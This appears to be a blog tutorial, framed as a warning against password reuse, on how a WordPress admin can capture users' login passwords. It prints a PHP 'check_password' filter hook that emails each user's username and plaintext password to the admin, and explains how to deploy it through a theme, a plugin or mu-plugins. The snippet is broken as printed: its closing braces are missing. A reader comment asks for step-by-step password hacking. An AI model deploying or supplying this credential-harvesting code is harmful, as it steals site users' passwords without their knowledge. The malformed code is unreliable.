How Your Password on WordPress Site is Hacked

Thanks for reading this tutorial “How Your Password on WordPress Site is Hacked” but before reading this tutorial i highly suggest you to change your password on other sites if you are using the same password on any WordPress site.

This is because the WordPress site admin can see your password when you log in to their site so if you are using the same password on any other site like facebook, twitter, linkedin, any back account or any other site then they can get access to it.

Therefore i recommend you to keep your WordPress site password different from your other sites password.

In this tutorial i am going to show you how the WordPress site admin hack your password when you log in to their site.

The Process of Hacking WordPress Password

There are various ways to hack password set on WordPress site. We are going to see below one of this method which is used by site admin to see user name and passwords of users registered on his site.

The site admin uses the following code to see your user name and password that you have set on his site.

The following code is used by adding it in the functions.php file of the Child Theme or Developing small WordPress plugin and adding the code in it.

To use the code the plugin or theme is activated where the code is added or just it’s added in the mu-plugins directory to execute it.

If the WordPress site is multisite then the developed plugin is network activated.

function custom_check_password( $check, $password, $hash, $user_id ){

	if( $check ){
		$user = get_user_by( 'id', $user_id );
		$admin_email_id = "";
		$subject = "Logged in user $user->user_login crdentials";
		$message = "User Name : $user->user_login  Password : $password";
		wp_mail( $admin_email_id, $subject, $message );
	return $check;
add_filter( 'check_password', 'custom_check_password', 10, 4 );

The above code sends an email to the site admin whenever you log in to his site, that email contains the user name and password that you have used to log in to his site.

Sometime instead of sending the email, the user credentials( user name and password ) are saved in the file on the server.

I hope this post will help you to understand how risky it is to use the same password on WordPress site.

Feel free to ask in the comments if you have any questions 🙂


  1. how to know other password ? with ethical hacking….
    i just wants that in step by step manner.


    1. Currently i have not written any information about it but may be in the future i will write it and then i will do let you know about it.


Leave a Reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload the CAPTCHA.